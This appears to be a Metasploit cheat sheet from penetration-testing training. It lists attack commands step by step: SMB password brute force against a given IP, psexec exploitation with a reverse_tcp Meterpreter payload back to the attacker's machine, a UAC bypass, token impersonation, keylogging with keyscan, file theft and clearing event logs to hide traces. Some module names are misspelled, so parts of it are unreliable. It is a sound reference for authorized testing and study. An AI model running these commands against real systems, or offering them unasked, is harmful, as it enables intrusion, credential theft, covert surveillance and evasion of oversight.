METASPLOIT

  • GENERAL USE
  • HOST DISCOVERY
  • SMB BRUTE FORCE
  • SMB ENUMERATION
  • METERPRETER

General Use:

search cve: "Number"                      | seaerch for specific vulnerability based on the CVE


info [path_to_exploit]                    | info provide information about the exploit


grep nameOFservice search type:exploit    | Ex: grep vnc search type:exploit


exploit/Linux/local                       | display all Linux exploits


exploit/Windows/local                     | display all windows exploits

Host discovery :

run autoroute -s [net block]

background 

use auxiliary/scanner/portscan/tcp

set RHOST netblock

set THREADS 10

set PORTS portNumbers

run

SMB Bruteforce: User-Pass

use auxiliary/scanner/smb/smb_login  |

set PASS_FILE /usr/share/seclists/Passwords/best15.txt

set USER_FILE /usr/share/seclists/Usernames/top_shortlist.txt

 set RHOSTS 10.130.40.70

 run

SMB Exploit:

use exploit/windows/smb/psexec   | credentials known, psexec module 

set SMPass password

set SMBUser administrator

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [Local_machine_IP]

exploit

SMB Enumeration

use auxiliary/scanner/smb/sbm_enumshares

set RHOSTS [IP address]

run

session -i 1 

shell

net use K:\\IP_ADDRESS\FILESHARE

download     | download files to the local machine

UAC Module :

use exploit/windows/bypassuac          | use the bypassuac module for privilege escalation

show options

exploit

NULL SESSION

sessions -i 1 

shell

whoami

use incognito    | 

list-tokens -u 

impersonate_token shareName\Administrator  |   ex: imporsonate_token user els-Win7\Administrator

Meterpreter Commands:

sysinfo                                | System Inforamtion


download [path]                        | Ex: download C:\\Users\Desktop\\Files.txt


upload  [FileNAME] [Target path]       | Ex: upload click.exe  C:\\USers\\Desktop


execute -f fileName.exe -i H           | execute on the target machine


search -f fileName                     | Ex: search -f secret.*


run post /                              | run Meterpreter post exploitation scripts

Meterpreter Post Exploitation:

run post /windows/gather                 | shows all the script for gathering information after exploitation


run post /windows/gather/enum_application | shows the installed application


run post /windows/gather/enum_services    | shows all the installed serviced


run post /windows/gather/win_privs        | shows if an OS has User Access Control [UAC]


run post/linux/gather/enum_system        | enumerate Linux system information after exploitation 


ps                                         | showing running processes


getpid processName                         | get the process name


run post /windows/manage/migrate           | migrates the session to a notepad.exe process


migrate pidNumber                          | migrate to specific process 


keyscan start                              | starting the keylogger


keyscan dump                               | shows keylogged characters


keyscan stop                               | stop the keylogger


clearev                                   | clear the logs to cover the traces


getsystem                                 | it is used with older Windows System for privilege escalation

Meterpreter with Incognito Extension:

use incognito                                | incognito helps impersonate other users tokens including the admin


list_tokens  -u                                |


impersonate_token  tokenName                        | Ex: impersonate user\\administrator

Linux Post Exploitation:

Privilege Escalation [Windows]

results matching ""

    No results matching ""